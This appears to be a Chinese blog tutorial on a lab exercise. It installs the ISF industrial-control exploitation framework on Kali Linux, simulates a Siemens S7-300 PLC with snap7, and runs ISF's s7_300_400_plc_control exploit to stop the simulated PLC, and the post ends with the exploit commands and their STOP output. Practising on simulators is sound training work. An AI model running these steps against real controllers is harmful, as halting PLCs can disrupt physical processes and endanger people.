目录
1.安装Vmware workstaion和Kali linux等软件,配置虚拟环境编辑
B.进入python-nmap文件夹:cd python-nmap,使用命令python2 setup.py install
C.进入python2中import nmap发现没有报错了,使用exit()退出
D.回到上一级文件夹,继续执行 python2 isf.py命令进行安装
3.使用snap7模拟PLC设备,解压压缩包,打开 \rich-demos\x86_64-win64\bin路径
(1).使用serverdemo.exe模拟PLC设备,用ipconfig查看本机ip,也即物理机IP,填写到serverdemo.exe中
(2)在serverdemo.exe界面先点击start启动server
(3)可以查看到serverdemo.exe下面日志就显示server started
(4) 使用clientdemo.exe模拟主机,clientdemo.exe界面上填写上物理机ip
(5)clientdemo.exe界面上点击connect连接
(6)这时继续查看server的日志,显示client已经added(serverdemo.exe)
什么是西门子S7-300启停
SIMATIC S7-300是德国西门子(Siemens)公司生产的模块化中小型PLC系统,能满足中等性能要求的应用。S7-300系统通过各种单独的模块之间的组合可进行构成不同要求的系统;S7-300的指令系统具备高速(0.6~0.1μs)的运算速度;S7-300支持用浮点数和反三角函数运算,能够有效地进行更为复杂的算术运算;S7-300通过统一的Step 7软件方便、简单的给所有模块进行组态和参数赋值;S7-300具备多级口令保护可以使用户高度、有效地保护其技术机密,防止未经允许的复制和修改;S7-300具备强大的通信功能,它多种不同的通信接口,并通过多种通信处理器来连接AS-I总线接口和工业以太网总线系统,多点接口(MPI)集成在CPU中,用于同时连接编程器、PC机、人机界面系统及其他SIMATIC S7/M7/C7等自动化控制系统。
1.安装Vmware workstaion和Kali linux等软件,配置虚拟环境
2.kali中安装工控漏洞利用框架 ISF
(1)在kali终端中使用命令:
git clone https://github.com/dark-lbp/isf/
(2)输入cd isf
(3)输入python2 isf.py
(4)这时有可能会报错:缺少nmap模块,方法:
A.克隆下载nmap模块的包
git clone https://github.com/johanlundberg/python-nmap
B.进入python-nmap文件夹:cd python-nmap,使用命令python2 setup.py install
C.进入python2中import nmap发现没有报错了,使用exit()退出
D.回到上一级文件夹,继续执行 python2 isf.py命令进行安装
3.使用snap7模拟PLC设备,解压压缩包,打开 \rich-demos\x86_64-win64\bin路径
(1).使用serverdemo.exe模拟PLC设备,用ipconfig查看本机ip,也即物理机IP,填写到serverdemo.exe中
(2)在serverdemo.exe界面先点击start启动server
(3)可以查看到serverdemo.exe下面日志就显示server started
(4) 使用clientdemo.exe模拟主机,clientdemo.exe界面上填写上物理机ip
(5)clientdemo.exe界面上点击connect连接
(6)这时继续查看server的日志,显示client已经added(serverdemo.exe)
4.打开ISF后,输入:
use exploits/plcs/siemens/s7_300_400_plc_control
5.show options
6.set target 物理机IP
7.run
这里显示 stop plc ,同时查看serverdemo.exe模拟器中的输出,可以发现已经停止
STOP-->OK
95
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
